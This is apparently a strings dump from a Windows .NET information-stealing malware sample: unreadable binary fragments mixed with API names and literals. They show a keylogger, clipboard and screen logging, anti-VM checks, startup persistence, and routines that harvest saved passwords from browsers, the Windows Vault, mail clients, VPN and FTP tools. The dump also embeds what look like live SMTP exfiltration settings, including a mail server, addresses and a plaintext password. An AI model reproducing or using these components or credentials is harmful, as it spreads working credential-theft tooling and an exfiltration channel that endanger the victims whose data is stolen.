!This program cannot be run in DOS mode.
`.rsrc
@.reloc
com.apple.Safari
Unable to resolve HTTP prox
1SPS*
KDBM(9
v4.0.30319
#Strings
& . Y |
"I"["_"t"
0Fah80
xvRpTyvBS0
8Tr1Scj0
Iy06HNw0
$$method0x6000122-1
$$method0x6000094-1
$$method0x6000085-1
$$method0x6000107-1
$$method0x6000127-1
$$method0x6000147-1
$$method0x6000128-1
$$method0x6000199-1
$$method0x600025c-1
$$method0x600010d-1
$$method0x600011d-1
HMACSHA1
aW7SxND1
lgTLZBH1
WJtNzRH1
VT_UI1
Uh0mYiiHvM1
sQJWX1
DYefteKQY1
IEnumerable`1
ICollection`1
IEnumerator`1
IList`1
CS$<>9__CachedAnonymousMethodDelegate1
fWmGAp0rEl1
get_Item1
g2EMsr1
$$method0x6000107-2
$$method0x600025c-2
$$method0x600011d-2
HMACSHA512
zpLV32
Advapi32
kernel32
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
ihIX72
Cf8i72
8GszGbYF892
VT_UI2
sxFJQL2
CVhTrwX2
WFFvs4qWY2
KeyValuePair`2
Dictionary`2
nBB8b2
PW45V3dh2
JQmNtmdj2
get_Item2
Stu4Un2
AkA3Oz2
rZxppC3
2vPapYJ3
zHWNU3
C0RBMqgU3
jvnBV3
HXZsi8Y3
m7OSBfpZ3
TudmVlyZ3
Tuple`3
hE74yh3
get_Item3
H9cun04
ToUInt64
ReadInt64
ToInt64
Ld1j84
aI8XogH4
VT_UI4
KCshAEmJtX4
a1EZqrc1jf4
qjBFj4
y5SQOuf8p4
MLZe05
bau9HN6L4Q5
KqQ2v7EQ5
syx89RXd5
RPZbyg5
gRbJIWvIjh5
ASjK516rm5
IS_TEXT_UNICODE_ASCII16
IS_TEXT_UNICODE_REVERSE_ASCII16
ToUInt16
ReadInt16
ToInt16
5O4zM926
HMACSHA256
mRKWK33d76
w51VeA6
Us4HxJ6
EHGkK6M6
vxGmZAY6
Z1l8LKHUSg6
BDmki6
ifIiEj6
xZhc3z6
xaINz6
Qz20eTOb07
qtET5ju9w97
g6jyBUG7
ZFEw4g1EBJ7
tXFFM7
aBYELBS7
qrdUxNOes08
9rv5QQjbN98
9aZPB8
get_UTF8
VT_UI8
VaultGetItem_WIN8
rjCpKWYR8
xJciaZ8
VYWssq0c8
5K0YRf8
sGmHan8
ud9VOBzs8
5ePhqQ9
mP8RB33HGS9
o27l5aT9
6mM8X9
0XPR8ZCx9X9
LEL3YKSiu9
<Module>
0rqkzWKA
IT1myoZA
Am1CsnzZA
I8x1k3eA
BMEVSBv3eA
oY7RmD1IkA
kjNzQft5oA
gpE6P0xA
tJleC5B
FTpzfECB
MK3fGWBDFIB
BCRYPT_KEY_DATA_BLOB
VT_BLOB
sAo1mrB
Z85YqHvB
IvyT1JyB
YoHIHIuWC4C
RPV0owi7C
vFrnBC
BCRYPT_KEY_DATA_BLOB_MAGIC
Usccyua5cC
I6uJshC
mA6xetHawC
g93nQxus93D
Yiz1AD
LLKHF_EXTENDED
LLKHF_INJECTED
VT_CLSID
get_ID
set_ID
FileHandleID
fileHandleID
lpdwProcessID
processID
get_FormatID
set_FormatID
NiA5Nxw9JD
M6KtSSWNrcD
m2YZxwowk2E
DUPLICATE_CLOSE_SOURCE
BCRYPT_CHAINING_MODE
bpTraZUbzDE
VT_STORAGE
INVALID_HANDLE
VT_FILETIME
IS_TEXT_UNICODE_SIGNATURE
IS_TEXT_UNICODE_REVERSE_SIGNATURE
VT_DATE
IS_TEXT_UNICODE_DBCS_LEADBYTE
4ze1I6DUE
280JSJPrE
eaHoDtE
H1v223I3F
M6V0IiVBF
ZwQj7YwPjBF
YdNrRp1fCF
hN8beFF
HTPnGq9MF
aURMn1QOF
Et8CjF
2Zx6VUm6G
BCRYPT_AUTH_MODE_CHAIN_CALLS_FLAG
r8R5s9BEG
KNxj1FG
eXs6NngJKZG
MUgwGj4qcdG
sbifsenlG
1hXlleasG
STATUS_AUTH_TAG_MISMATCH
STATUS_INFO_LENGTH_MISMATCH
4wqVDH
IS_TEXT_UNICODE_ODD_LENGTH
BCRYPT_AUTH_TAG_LENGTH
BCRYPT_OBJECT_LENGTH
CSmYFXH
TIih8WcH
qjJRK78gH
ga4cx9YlmH
e704JcFyH
u8VLA068XzH
WlWuLvpgxGI
get_ASCII
xD0VslMVdI
fVOatvCmI
vIESaEAFwzI
D1iMJnyND8J
GegPANCFJ
3Jr5OMJ
JuOOMGLwRJ
gvunE0tTJ
Iw6t4LaJ
rxhRSLAcJ
EEHC6oYeJ
RMlA5DKvVnJ
I7OwQaTt4DK
vf7qDK
ZaKY8LK
w8QD5IWNK
IS_TEXT_UNICODE_UNICODE_MASK
IS_TEXT_UNICODE_NOT_UNICODE_MASK
IS_TEXT_UNICODE_REVERSE_MASK
IS_TEXT_UNICODE_NOT_ASCII_MASK
j4GHg5mK
lzXPWaoK
xwRLGzK
sDA41L
KMTQ7L
VT_DECIMAL
jQ9lS7LL
VT_NULL
WH_KEYBOARD_LL
VT_BOOL
SmtpSSL
aBeeb5VL
CG3vaL
Vb03NjrL
VT_VERSIONED_STREAM
VT_STREAM
BCRYPT_CHAIN_MODE_GCM
BCRYPT_AES_ALGORITHM
GiGpNM
yLTFjViOKOM
rXMopVWACPM
3DGtD1yWM
4D83VOy2aM
mg4neSeM
KW9r50qM
SKr6UyHqM
iLFwVblNrM
5rnzvJN
BCRYPT_INIT_AUTH_MODE_INFO_VERSION
HC_ACTION
LLKHF_ALTDOWN
WM_SYSKEYDOWN
WM_KEYDOWN
osDeJ9h8kpN
T9SPSFwxtN
System.IO
CjNpaBsD0TO
D32656ycRvO
e5rsOxO
8syFBP
BCRYPT_PAD_OAEP
WM_SYSKEYUP
WM_KEYUP
LLKHF_UP
QPhRgP
vKwJnP
T6Y2HlQ
MS_PRIMITIVE_PROVIDER
Z3XSMmLWKR
VT_ERROR
VT_VECTOR
hmeWLsTOR
VT_BSTR
VT_LPSTR
VT_LPWSTR
QpAYkcR
KaILhR
S0re5IZqR
m3yQCBhAsR
XmMbL7kwR
9nAe90bq0S
IS_TEXT_UNICODE_STATISTICS
IS_TEXT_UNICODE_REVERSE_STATISTICS
IS_TEXT_UNICODE_NULL_BYTES
IS_TEXT_UNICODE_CONTROLS
IS_TEXT_UNICODE_REVERSE_CONTROLS
IS_TEXT_UNICODE_ILLEGAL_CHARS
DUPLICATE_SAME_ACCESS
ERROR_SUCCESS
STATUS_SUCCESS
BCRYPT_PAD_PSS
sMngUS
D3WsKkS
Dj0plrS
rNNjrLKRyS
VT_UINT
VT_INT
gbnIa3m1OT
67jQBYbxQT
PqYmBkBRT
YkNpqQST
njDnwXMvT
YCj5exT
LpcW3g0U
vlxYJE0F3U
zkbd5U
vkc4sRlLU
CHmJxE7dSU
HWtN6VU
YACIj6jU
7VahoJYKAkU
qWFkjqU
kJBCoIuU
HBOSki0V
HLnscrjg49V
kWpU7K9noDV
get_IV
set_IV
MkhqIMV
vOmFV8H1DPV
LOPAUV
VhgSvMvOTVV
VwFlqNtSWV
ek7ZWV
QlRYmdV
KvBAMAyV
AuhQfDHS0W
F5u2fG4MBW
STATUS_BUFFER_OVERFLOW
4cGTWVW
Lwqm6Kh8aW
l4ST4lExaW
cPiDWZqdW
JLs2EhW
LxtlKTuimW
djAWUpiUqW
dCwxOAWrW
MMnOjXz1X
4JJG6X
eMyLbQAX
k0bckWHX
DBfsldX
v43DJTK2AY
VT_ARRAY
9mzu73yBY
VT_EMPTY
pEb0YTY
tYkaaEFlHUY
NDsx6FVY
B4OG3Z
HvibZ1LLZ
sLw7FPZ
y1y9esZ
value__
WL1ANa
LL3PPXa
hxZH0gXba
get_Data
set_Data
cbData
ProtectedData
cbAuthData
pbAuthData
PropertyData
SetQuota
GAaax3iepwa
dUA3U56b
IWXQ949VW9b
OsvWCb
2fVeDb
qC4FxTa2YJb
bcfYRb
PublicIpAddressGrab
wGS7Qfxeb
ZuyLfb
mscorlib
GoyOeyPXzib
SnaQAinb
9399542a-76f8-4416-a309-38c8d6207f1c
c3BLa3c
2grojNc
5cGCAWUc
moPv6KWc
HZf2ec
System.Collections.Generic
Microsoft.VisualBasic
WndProc
HookProc
ozqsL5bWrc
FromFileTimeUtc
JNa8c42FEd
get_Id
SchemaId
schemaId
pszAlgId
HookId
GetWindowThreadProcessId
processId
SchemaElementId
3ItIGeWd
NcYibrlGjWd
G3kteqYd
PageExecuteRead
OpenRead
FileMapRead
VirtualMemoryRead
CreateThread
lpcbNeeded
DomainExtended
SHA1Managed
RijndaelManaged
add_Changed
remove_Changed
get_LastModified
set_LastModified
_lastModified
Interlocked
set_Enabled
get_IsEnabled
set_IsEnabled
_enabled
Undefined
lpOverlapped
samDesired
add_Elapsed
get_LastAccessed
set_LastAccessed
_lastAccessed
get_Reserved
reserved
TorPid
activeWindowPid
pPackageSid
row_id
get_IsInvalid
get_Guid
vaultGuid
PcHwid
<ID>k__BackingField
<FormatID>k__BackingField
<Data>k__BackingField
<LastModified>k__BackingField
<IsEnabled>k__BackingField
<LastAccessed>k__BackingField
<Password>k__BackingField
<password>k__BackingField
<PropertyStorage>k__BackingField
<Name>k__BackingField
<FileName>k__BackingField
<ApplicationName>k__BackingField
<Username>k__BackingField
<username>k__BackingField
<Type>k__BackingField
<type>k__BackingField
<TypedPropertyValue>k__BackingField
<Size>k__BackingField
<IsRunning>k__BackingField
<Path>k__BackingField
<hostmask>k__BackingField
<Version>k__BackingField
<Application>k__BackingField
<Description>k__BackingField
<user>k__BackingField
<hoster>k__BackingField
<Tasks>k__BackingField
<objects>k__BackingField
<Accounts>k__BackingField
<Keys>k__BackingField
<Lenght>k__BackingField
<Host>k__BackingField
<GuidMasterKey>k__BackingField
GetField
TrimEnd
ReadToEnd
AppEnd
Append
get_Millisecond
GetUpperBound
GetLowerBound
uMPeod
set_Method
method
Clipboard
get_Password
set_Password
DomainPassword
SmtpPassword
get_password
set_password
ii6m02Sq2e
o2w1wdu4e
kYq7p0Ke
3ml5QsLRe
Replace
IsNullOrWhiteSpace
DeleteBackspace
QueryDosDevice
hInstance
IdentityReference
Sequence
cbNonce
pbNonce
Resource
vkCode
wScanCode
scanCode
keyCode
set_Mode
FileMode
ShareMode
PaddingMode
CryptoStreamMode
CipherMode
SelectSingleNode
XmlNode
get_Unicode
get_BigEndianUnicode
IsTextUnicode
UKwkfe
FromImage
SectionImage
get_PropertyStorage
set_PropertyStorage
SerializedPropertyStorage
SendMessage
MailMessage
AddRange
CompareExchange
CredentialCache
SectionNoCache
EndInvoke
BeginInvoke
GetEnvironmentVariable
SetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
hSourceHandle
SafeHandle
GetModuleHandle
RuntimeTypeHandle
ReleaseHandle
CloseHandle
DuplicateHandle
CreateHandle
GetTypeFromHandle
hSourceProcessHandle
hTargetProcessHandle
lpTargetHandle
bInheritHandle
vaultHandle
activeWindowHandle
handle
Rectangle
ToSingle
CreateFile
hTemplateFile
DeleteFile
WriteFile
MoveFile
MapViewOfFile
UnmapViewOfFile
lastTitle
activeWindowTitle
lphModule
get_MainModule
ProcessModule
get_Name
set_Name
lpDeviceName
get_FileName
set_FileName
GetModuleFileName
lpExistingFileName
lpFileName
GetFileName
lpNewFileName
_fileName
get_ModuleName
lpModuleName
lpBaseName
baseName
lpValueName
StartupRegName
rootPathName
get_OSFullName
get_FullName
OperatingSystemName
get_ApplicationName
set_ApplicationName
StartupInstallationName
lpName
lpAppName
get_UserName
get_ComputerName
ThisComputerName
ProcessorName
get_ProcessName
processName
StartupEnvName
GetProcessesByName
lpKeyName
pszCredentialFriendlyName
StartupDirectoryName
GetDirectoryName
astable_name
item_name
Filename
filename
get_Username
set_Username
get_username
set_username
System.Net.Mime
DateTime
GetLastAccessTime
dwTime
AppendLine
get_NewLine
Combine
LocalMachine
Escape
Unescape
DataProtectionScope
get_Type
set_Type
set_MediaType
pszBlobType
GetFileType
MimeType
ValueType
LogType
SecurityProtocolType
GetType
ContentType
item_type
get_type
set_type
FileShare
Compare
System.Core
PtrToStructure
get_InvariantCulture
Capture
HttpWebResponse
GetResponse
Dispose
Reverse
X509Certificate
GenericCertificate
DomainCertificate
Create
KBDLLHookProcDelegate
MulticastDelegate
Terminate
PcState
GetKeyboardState
lpKeyState
GetKeyState
Delete
PageReadWrite
PageExecuteReadWrite
nNumberOfBytesToWrite
FileMapWrite
VirtualMemoryWrite
Remote
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
SecuritySafeCriticalAttribute
ExtensionAttribute
AssemblyFileVersionAttribute
FlagsAttribute
CompilationRelaxationsAttribute
ReliabilityContractAttribute
ParamArrayAttribute
RuntimeCompatibilityAttribute
SuppressUnmanagedCodeSecurityAttribute
set_UseShellExecute
FileMapExecute
ReadByte
ToByte
get_Value
HandleValue
TryGetValue
get_TypedPropertyValue
set_TypedPropertyValue
GetPropertyValue
set_KeepAlive
Remove
SectionReserve
MC8c7Pgxe
kCEsIZ3ze
get_Size
set_Size
dataSize
cbSize
get_StorageSize
lpFileSize
get_NameSize
volumeNameSize
nFileSystemNameSize
SQLDataTypeSize
get_StoreSize
get_ValueSize
get_HashSize
set_BlockSize
chunkSize
get_KeySize
Serialize
Deserialize
Initialize
Finalize
Synchronize
page_size
Resize
oVcCtalv3f
G608nbovG5f
w1K847tbFf
SizeOf
get_ItemOf
LastIndexOf
C7Q080FIWf
kjD3tAGStYf
AnkTcf
cchBuff
cw9Zhf
n1uhLjf
lastInputInf
lDTNN7g
vuNABvAg
ditlHg
4NuBeoqMg
Zp9YQg
N5GN3iTg
Ine8LGYg
get_Jpeg
alci1blg
System.Threading
get_Padding
set_Padding
UTF8Encoding
encoding
System.Drawing.Imaging
get_IsRunning
set_IsRunning
CreateFileMapping
FromBase64String
ToBase64String
EscapeDataString
UnescapeDataString
DownloadString
lpReturnedString
GetPrivateProfileString
ToString
GetString
OctetString
BitString
Substring
System.Drawing
uq37n76rg
get_Msg
1KcyN3Wdqug
fjkwA0jlt0h
QRVpI5h
DL0hp76h
qLdobEh
AS1k6GRh
lgWSxmah
WUN4X5ch
SmtpAttach
dwMaximumSizeHigh
dwFileOffsetHigh
Eag33bGhjh
ComputeHash
get_Path
set_Path
SystemAppdataPath
get_ExecutablePath
AsmFilePath
AppStartupFullPath
GetTempPath
GetFolderPath
lpTargetPath
StartupDirectoryPath
get_Width
get_Length
MaximumLength
dwMinLength
SystemInformationLength
ObjectInformationLength
set_MaxJsonLength
ReturnLength
maximumComponentLength
GetWindowTextLength
dwMaxLength
EndsWith
StartsWith
wkJByh
asEGAr2kzh
HUIa2i
FXNZCAi
or17ZiLi
F4mbRi
wRHQFpTi
Bdr4xk3Yi
KtkFUvjdi
PtrToStringUni
StringToHGlobalUni
v9cdcUEj
5SiFaj
objrij
SYSaNraeyj
GNpd0k
qLHaD7lIZLk
DOVoa4gMk
239lOYk
noyTbk
AsyncCallback
RemoteCertificateValidationCallback
get_ServerCertificateValidationCallback
set_ServerCertificateValidationCallback
callback
get_CapsLock
TransformFinalBlock
TransformBlock
bKPpTEdk
8zCthk
EWpWfynk
idHook
_clipboardHook
_keyboardHook
get_hostmask
set_hostmask
Ioo866YQ8l
gDomsvDl
rXixCWHl
6VAy68596Ml
DPQoKRl
RUbeOWl
AllocHGlobal
FreeHGlobal
Illegal
Marshal
NetworkCredential
Decimal
System.Security.Principal
set_Interval
ScreenInterval
KeyloggerInterval
Rijndael
cbLabel
pbLabel
System.Collections.ObjectModel
System.ComponentModel
EnableTorPanel
System.Net.Mail
Kernel32.dll
kernel32.dll
User32.dll
user32.dll
vaultcli.dll
psapi.dll
ntdll.dll
bcrypt.dll
kaaUlll
System.Xml
set_IsBodyHtml
set_SecurityProtocol
Control
4gjzDPsl
set_EnableSsl
5tVoul
6tVNJK0zZ0m
WYqKk3m
qtVdqp7m
HIDuTKE0dHm
SrDxyDfJm
8ZI2kTm
FileStream
get_BaseStream
GetResponseStream
CryptoStream
MemoryStream
get_LParam
get_WParam
get_Param
lParam
wParam
get_Item
set_Item
VaultGetItem
vaultItem
OperatingSystem
HmacAlgorithm
SymmetricAlgorithm
phAlgorithm
KeyedHashAlgorithm
algorithm
Random
ICryptoTransform
DCVt6NHsm
Maximum
root_num
N9GdPoum
B3lTdcTn
m3r8Un
x0Pv3Dac9Wn
ToBoolean
IsLittleEndian
CopyFromScreen
get_PrimaryScreen
lpNumberOfBytesWritten
X509Chain
ChangeClipboardChain
KVVSDe2Qkn
Extension
get_OSVersion
get_Version
set_Version
dwInfoVersion
get_Application
set_Application
get_Location
ObjectDataInformation
SystemRegistryQuotaInformation
SystemBasicInformation
ObjectBasicInformation
QueryLimitedInformation
SystemPerformanceInformation
SystemProcessorPerformanceInformation
SystemLookasideInformation
SystemHandleInformation
ObjectNameInformation
GetVolumeInformation
ObjectTypeInformation
ObjectAllInformation
NtQuerySystemInformation
SystemExceptionInformation
SystemProcessInformation
ObjectInformation
SetInformation
SystemInterruptInformation
SystemTimeOfDayInformation
QueryInformation
VirtualMemoryOperation
pszImplementation
System.Globalization
System.Web.Script.Serialization
System.Reflection
PropertyDataCollection
ValueCollection
MatchCollection
GroupCollection
ManagementObjectCollection
AttachmentCollection
KeyCollection
set_Position
CreationDisposition
get_ContentDisposition
SearchOption
Win32Exception
CryptographicException
ArgumentOutOfRangeException
ArgumentException
get_Description
set_Description
get_StatusDescription
_description
System.Runtime.ConstrainedExecution
StringComparison
cyL6F8fpn
add_KeyDown
remove_KeyDown
get_CtrlKeyDown
get_ShiftKeyDown
get_AltKeyDown
Unknown
ohOG5du0o
NIDDAuj3o
BLxNNKo
CompareTo
CopyTo
8C78isHTVco
lastInPutNfo
dwExtraInfo
ImageCodecInfo
FieldInfo
FileInfo
CultureInfo
pPaddingInfo
FileSystemInfo
MemberInfo
ComputerInfo
get_StartInfo
ProcessStartInfo
GetLastInputInfo
DirectoryInfo
Hs4Brno
fHfXQzVTqo
YODFipvo
0ehAFb5p
q3efol5p
AHifpy9Dp
P94mGp
qZPlOp
b7mGyUp
add_KeyUp
remove_KeyUp
9FxEr4Zp
dwNumberOfBytesToMap
Bitmap
yEnXaip
TimeStamp
LocalApp
QapwGuNerp
310KRurp
AppAddStartup
HideFileStartup
8SNMzp
lMhmXYZSq
GUfFf5kYq
F11EX93zYq
i9MKfq
NUWRhq
System.Linq
UwSvSmgizoq
sOMaSuq
HzoKxaHvq
0Hrxwzq
lFUhAJW22r
LeuuUZxZ9r
5JvtpHr
CqSP68Ir
9awvwHGXr
ToChar
lpChar
DirectorySeparatorChar
poJ9VRzcr
ObjectTypeNumber
volumeSerialNumber
StreamReader
TextReader
BinaryReader
SHA1CryptoServiceProvider
MD5CryptoServiceProvider
RNGCryptoServiceProvider
TripleDESCryptoServiceProvider
BCryptCloseAlgorithmProvider
BCryptOpenAlgorithmProvider
IFormatProvider
StringBuilder
SpecialFolder
SmtpSender
sender
Encoder
volumeNameBuffer
fileSystemNameBuffer
buffer
ServicePointManager
Integer
EnableClipboardLogger
EnableScreenLogger
_screenLogger
_keyLogger
EnableKeylogger
ManagementObjectSearcher
ObjectIdentifier
SecurityIdentifier
ElapsedEventHandler
LogTimer
ToUpper
CurrentUser
get_user
set_user
EncoderParameter
Object_Pointer
BitConverter
get_hoster
set_hoster
BinaryFormatter
SmtpReceiver
SmtpServer
SetClipboardViewer
ToLower
JavaScriptSerializer
get_Major
get_Minor
GetLastWin32Error
GetLastError
Authenticator
IEnumerator
ManagementObjectEnumerator
GetEnumerator
RandomNumberGenerator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
passwordVaultPtr
ReadIntPtr
SlfW1bLvwr
EJl1Z4yr
4aYm5dTT1s
Kb33Is
GnYfwk7Is
bLsrfQs
hDpYI3sRs
VYfyg0Us
0HpkDxW6as
Graphics
System.Diagnostics
get_Bounds
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
GetInstances
get_ChildNodes
Matches
EnableCookies
GetDirectories
master_table_entries
get_Properties
ExpandEnvironmentVariables
GetFiles
EnumProcessModules
NumberStyles
GetSubKeyNames
field_names
ReadAllLines
GetProcesses
System.Security.Cryptography.X509Certificates
FlagsAndAttributes
lpFileMappingAttributes
SecurityAttributes
FileBytes
Rfc2898DeriveBytes
ReadAllBytes
BufferBytes
GetBytes
db_bytes
get_Values
GetLogicalDrives
rVUvgUpWofs
fileSystemFlags
dwFlags
ElapsedEventArgs
kfNGjs
get_Ticks
get_Tasks
set_Tasks
ICredentials
set_Credentials
get_DefaultCredentials
set_UseDefaultCredentials
Equals
CreateParams
VaultEnumerateItems
System.Windows.Forms
Contains
System.Web.Extensions
System.Text.RegularExpressions
iterations
System.Collections
set_MaximumAutomaticRedirections
StringSplitOptions
RegexOptions
options
get_Groups
xdiZrZ8rs
get_Chars
GetImageEncoders
System.Timers
RuntimeHelpers
EncoderParameters
SslPolicyErrors
RLUoxrs
SystemInformationClass
ObjectInformationClass
ManagementClass
dwDesiredAccess
GrantedAccess
FileAccess
FileMapAllAccess
processAccess
get_Success
CreateProcess
hProcess
OpenProcess
GetCurrentProcess
lpBaseAddress
MailAddress
PublicIpAddress
EnableContacts
get_objects
set_objects
VaultEnumerateVaults
pPropertyElements
get_Attachments
set_Arguments
get_Accounts
set_Accounts
get_Exists
J4UzSLus
nZxmxDe6Sus
get_Keys
set_Keys
get_ModifierKeys
GjwvZ5zs
ULpHj8ld6t
Concat
AppendFormat
ImageFormat
Subtract
VT_BLOB_Object
VT_STREAMED_Object
VT_STORED_Object
ManagementBaseObject
hFileMappingObject
hObject
ManagementObject
cbKeyObject
pbKeyObject
NtQueryObject
object
set_Subject
Collect
set_AllowAutoRedirect
flProtect
Unprotect
System.Net
offset
orXEZLRpgt
get_Height
get_Lenght
set_Lenght
op_Explicit
SectionCommit
WaitForExit
cbSalt
VaultOpenVault
get_Default
lpDefault
pcbResult
IAsyncResult
phkResult
result
UnsignedInt
ToUpperInvariant
set_UserAgent
PublicUserAgent
WebClient
SmtpClient
System.Management
pResourceElement
XmlElement
pAuthenticatorElement
pIdentityElement
dwIncrement
sql_statement
Attachment
Environment
XmlDocument
get_Parent
GetParent
get_Current
CheckRemoteDebuggerPresent
isDebuggerPresent
content
get_Count
get_HandleCount
get_TickCount
vaultItemCount
set_IterationCount
dwPropertiesCount
vaultCount
BCryptDecrypt
BCryptEncrypt
TrimStart
AppStart
Convert
set_Port
SmtpPort
UnsignedShort
HttpWebRequest
XmlNodeList
ToList
MozillaBrowserList
ChromiumBrowserList
get_Host
set_Host
ICredentialsByHost
4w4aMxtt
oizT6vOR4ut
set_Timeout
GetKeyboardLayout
dwLayout
cbInput
pbInput
cbOutput
pbOutput
get_StandardOutput
set_RedirectStandardOutput
MoveNext
System.Text
LastCopiedText
KeylogText
ReadAllText
AppendAllText
get_InnerText
GetText
GetWindowText
Log_text
cbMacContext
pbMacContext
ofXKKrfxt
JOBDB5u
CG8Ulz0bDu
wDH2Ku
MA9Qxsu
wFFidxu
w93B2kDv
VLn3VwFv
njWB7Iv
6NrVvXkLaKv
DszbcNv
atJXQQv
BuvMY4w
T5cyxO17w
PjQX4HKyTCw
SKTzxzsJw
m6hRCUTKw
pWAMH7Pw
NHH5Uw
LCVUXw
dwMaximumSizeLow
dwFileOffsetLow
get_Now
GetForegroundWindow
NativeWindow
set_CreateNoWindow
Hdpvrzrw
IdyA448Cq6x
ToUnicodeEx
GetModuleFileNameEx
RegQueryValueEx
GetFileSizeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
MaximumEx
RegOpenKeyEx
IVdGDgCFx
ucchMax
BufferEndIndex
BlockIndex
BufferStartIndex
hC40zjd5flx
bJi9Rox
FPnaqx
2BThLrx
uwqp3y
cQrN2ZEy
120HqGy
IxUILcD3sHy
CcrsBLy
POiGwIvLy
HEo6NGCEVy
Dg4xy4hXy
ProtectedArray
ToByteArray
InitializeArray
ToArray
ToCharArray
Consistency
set_Body
get_Key
set_Key
OpenSubKey
subKey
RegCloseKey
get_GuidMasterKey
set_GuidMasterKey
_guidMasterKey
ContainsKey
wVirtKey
hImportKey
BCryptImportKey
BCryptDestroyKey
RegistryKey
_wsftpkey
XIV4Dgy
System.Security.Cryptography
WWPv3iy
GetExecutingAssembly
PageReadonly
Multiply
PageWriteCopy
BlockCopy
FileMapCopy
System.Runtime.Serialization.Formatters.Binary
AmountOfMemory
get_TotalPhysicalMemory
Directory
Registry
get_Capacity
Quality
op_Equality
op_Inequality
System.Security
System.Net.Security
Identity
IsNullOrEmpty
BCryptSetAlgorithmProperty
BCryptGetProperty
BCryptSetProperty
pszProperty
JYXIwTRAvy
1HAifa8G8z
eVVuB8RRCz
ppqENjIz
efvzMz
lH3Oi83Tz
cRvqqKTz
fr0dnWz
VsT1Vhz
iBENiz
gctWqz
e3Bg4X53uz
$cbd2c98c-006d-4a64-b0fb-884f14e3038b
WrapNonExceptionThrows
1.0.0.0
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
t t t!t"t#t$t%t&t't(t)t*t+t,t-t.t/t0t1t2t3t4t5t6t7t8t9t:t;t<t=t>t?t@tAtBtEtFtGtHtItLtgy}y
k#n+n9
5 6 7!8"9#:$;%<&='>(?)@*A+B,C-D0E4F5G6H7I8J9L:O;P=RAUD^FdJvPwTxVyYz]{`
CBDBJIKIRQWVXVYV]\dcfegeheiejekenm
image/jpg
yyyy_MM_dd_HH_mm_ss
/log.tmp
yyyy-MM-dd HH:mm:ss
IP Address:
<br>RAM:
<br>User Name:
<br>CPU:
<br>OSFullName:
Time:
<br>Computer Name:
MM/dd/yyyy HH:mm:ss
OSFullName:
Recovered!
Time:
User Name:
https://api.ipify.org
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
mail.alitextile.com
mo@alitextile.com
Myname@321
mato@alitextile.com
appdata
AkpPKsd
AkpPKsd.exe
http://ip-api.com/line/?fields=hosting
SbieDll.dll
snxhk.dll
cmdvrt32.dll
Sf2.dll
SxIn.dll
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
root\CIMV2
SELECT * FROM Win32_VideoController
VMware
]</b> (
{KEYRIGHT}
{ALT+F4}
{ENTER}
{HOME}
{Insert}
{CTRL}
{CAPSLOCK}
control
{PageDown}
{KEYUP}
{NumLock}
{KEYDOWN}
{KEYLEFT}
{BACK}
{ALT+TAB}
{PageUp}
"
<br><hr>Copied Text: <br>
logins
IE/Edge
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
SchemaId
pResourceElement
pIdentityElement
pPackageSid
pAuthenticatorElement
UC Browser
UCBrowser\
Login Data
journal
wow_logins
Safari for Windows
\Common Files\Apple\Apple Application Support\plutil.exe
\Apple Computer\Preferences\keychain.plist
<string>
</string>
<data>
</data>
<dict>
<array>
-convert xml1 -s -o "
\fixed_keychain.xml"
\Microsoft\Credentials\
\Microsoft\Protect\
credential
QQ Browser
\Default\EncryptedStorage
\EncryptedStorage
Profile
Tencent\QQBrowser\User Data
entries
category
Password
password_value
IncrediMail
SmtpPassword
PopPassword
Software\IncrediMail\Identities\
\Accounts_New
SmtpServer
EmailAddress
Eudora
Software\Qualcomm\Eudora\CommandLine\
current
Settings
SavePasswordText
ReturnAddress
Falkon Browser
\falkon\profiles\
startProfile=([A-z0-9\/\.\"]+)
profiles.ini
\browsedata.db
autofill
ClawsMail
\clawsrc
\Claws-mail
passkey0
master_passphrase_salt=(.+)
master_passphrase_pbkdf2_rounds=(.+)
\accountrc
smtp_server
address
account
\passwordstorerc
{(.*),(.*)}(.*)
Flock Browser
APPDATA
\Flock\Browser\
signons3.txt
DynDns
username=
password=
https://account.dyn.com/
ALLUSERSPROFILE
Dyn\Updater\config.dyndns
t6KzXhCh
Dyn\Updater\daemon.cfg
global
accounts
account.
username
password
Psi/Psi+
\accounts.xml
\Psi\profiles
\Psi+\profiles
OpenVPN
Software\OpenVPN-GUI\configs
Software\OpenVPN-GUI\configs\
auth-data
entropy
remote
USERPROFILE
\OpenVPN\config\
NordVPN
NordVpn.exe*
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
Private Internet Access
%ProgramW6432%
Private Internet Access\data
ProgramFiles(x86)
\Private Internet Access\data
\account.json
.*"username":"(.*?)"
.*"password":"(.*?)"
privateinternetaccess.com
FileZilla
\FileZilla\recentservers.xml
<Server>
<Host>
</Host>
<Port>
</Port>
<User>
</User>
<Pass encoding="base64">
</Pass>
<Pass>
CoreFTP
SOFTWARE\FTPWare\COREFTP\Sites
hdfzpysvpzimorhk
WinSCP
SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
